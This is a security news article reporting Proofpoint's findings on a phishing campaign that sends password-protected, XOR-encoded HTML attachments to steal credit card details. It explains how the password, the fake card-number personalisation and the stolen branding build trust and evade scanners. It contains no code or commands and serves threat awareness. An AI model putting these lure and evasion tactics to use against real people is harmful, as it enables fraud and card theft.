Connect with us

Hi, what are you looking for?



Phishers Adopt Malware Distribution-Like Tactics

A recently detected phishing campaign designed to steal credit card information employed a series of attack tactics previously associated with malware distribution, Proofpoint security researchers reveal.

A recently detected phishing campaign designed to steal credit card information employed a series of attack tactics previously associated with malware distribution, Proofpoint security researchers reveal.

The technique involves the distribution of a malicious document inside a .zip archive that is password-protected. The archive is attached to an email and the password to open it is included in the email body. Most recently, the method was used to distribute the Cerber ransomware (the campaign also dropped the Ursnif banking Trojan).

Recently, phishers decided to adopt the technique and adapt it to their needs in an attempt to steal banking data. However, instead of an Office document, this attack uses an HTML attachment that has been password-protected.

As expected, the email message is personalized with the recipient’s name, as well as with what supposedly represents the first digits of their credit card account number. However, since these digits are standardized, this apparent personalization is only meant to create a sense of legitimacy for the carefully crafted emails without requiring actual knowledge of a potential victim’s actual card number.

Furthermore, the spam emails use stolen branding and social engineering tactics to create a sense of urgency and trick the user into giving away their credit card information: recipients are told they need to update their security information for their “new chip card.”

The HTML attachment used in this campaign was found to be XOR-encoded to make dynamic analysis more difficult. According to Proofpoint, the password protection is implemented with the help of JavaScript. A script named pah.js is used to decrypt the XOR-encoded HTML when the user enters the password.

As soon as the user enters the password provided in the email body and the HTML attachment is decrypted, a fairly typical credit card phishing template complete with stolen branding is displayed. The same as in credential phishing attacks performed via HTTP POST, users are required to enter their credentials in the form.

Advertisement. Scroll to continue reading.

The use of a password-protected attachment is meant not only to make detection and analysis more difficult, but also to convince users that the email is legitimate. The fact that the password is included in the email body also adds to this sense of legitimacy, in addition to making it easy for the recipients to open the attachment.

“Credential and credit card phishing are nearly as old as cybercrime itself. This hasn’t stopped phishing actors from innovating, exploring new approaches to convincing users to divulge personal, banking, and financial information. In this case, we observed threat actors taking a cue from malware distributors, using password protected document attachments to bypass anti-malware technologies and give recipients a false sense of security,” Proofpoint researchers note.

Related: Backdoored Phishing Templates Advertised on YouTube

Related: Cybercriminals Use New Tricks in Phishing Attacks

Written By

Ionut Arghire is an international correspondent for SecurityWeek.

Click to comment

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

SecurityWeek’s Threat Detection and Incident Response Summit brings together security practitioners from around the world to share war stories on breaches, APT attacks and threat intelligence.


Securityweek’s CISO Forum will address issues and challenges that are top of mind for today’s security leaders and what the future looks like as chief defenders of the enterprise.


Expert Insights

Related Content


The easiest way for a cyber-attacker to gain access to sensitive data is by compromising an end user’s identity and credentials. Things get even...

Application Security

Fortinet on Monday issued an emergency patch to cover a severe vulnerability in its FortiOS SSL-VPN product, warning that hackers have already exploited the...


The North Korean APT tracked as TA444 is either moonlighting from its previous primary purpose, expanding its attack repertoire, or is being impersonated by...

Application Security

Password management firm LastPass says the hackers behind an August data breach stole a massive stash of customer data, including password vault data that...

Application Security

Microsoft on Tuesday pushed a major Windows update to address a security feature bypass already exploited in global ransomware attacks.The operating system update, released...


The Single Most Important Part of Dealing with a Phishing Attack is Preparing for the Attack Before it Actually Happens.

Application Security

Electric car maker Tesla is using the annual Pwn2Own hacker contest to incentivize security researchers to showcase complex exploit chains that can lead to...


Reddit says its systems were hacked following a sophisticated phishing attack aimed at employees.